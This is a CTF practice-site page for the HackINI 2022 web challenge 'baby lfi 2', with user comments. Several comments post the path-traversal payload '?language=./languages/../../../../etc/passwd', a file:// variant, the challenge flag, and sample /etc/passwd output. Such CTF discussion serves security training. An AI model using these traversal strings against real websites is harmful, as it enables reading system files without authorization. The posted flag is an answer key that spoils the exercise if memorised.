baby lfi 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2601
提  示:
描  述:
What about making things a bit harder ?
评论
unknown237819 2年前

这脑洞也太大了吧

回复 4

868954104 2年前

?language=./languages/../../../../../etc/passwd shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

868954104 2年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

我说我风华绝代 2年前

下面解析的链接挂了,大概就是后台会验证是不是在当前language目录下,但是没有验证后面../的目录穿越,所以先输入./language/

回复 2

yituoshi 2年前

Half the truth is often a big lie:Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin

回复 0

逐月 2年前

这篇思路解释的挺详细 http://t.csdnimg.cn/sIZDF

回复 0

bhgctfon 2年前

文件包含漏洞构造网址, ?language=./languages/../../../../etc/passwd

回复 2

qingye 2年前

language=./languages/../../../../etc/passwd

回复 0

zhangye 2年前

直接用伪协议非法,加上languages就可以了

回复 0

老渡真的不懂 2年前

好嘛不能直接访问,要跳来跳去。?language=./languages/../file://../../../../etc/passwd

回复 1

WriteUp

image
gushi666

2 金币

评分(6)

解题动态

zerogoctf 攻破了该题 1天前
帅Yu 攻破了该题 2天前
yyt030 攻破了该题 2天前
Icey艾希 攻破了该题 3天前
erobot 攻破了该题 4天前
oohyodec 攻破了该题 4天前
出题人我会一直让你等着 攻破了该题 4天前
xuyp 攻破了该题 4天前
2790819062 攻破了该题 5天前
noooo 攻破了该题 5天前
1921682550 攻破了该题 6天前
Fengyu3321 攻破了该题 6天前
六眼飞鱼 攻破了该题 7天前
意料之中是戏 攻破了该题 7天前
Tim.Drake 攻破了该题 9天前
Dawn123 攻破了该题 9天前
jhgtx 攻破了该题 10天前
linxi789654 攻破了该题 10天前
lyy 攻破了该题 10天前
1211020612 攻破了该题 12天前
问题反馈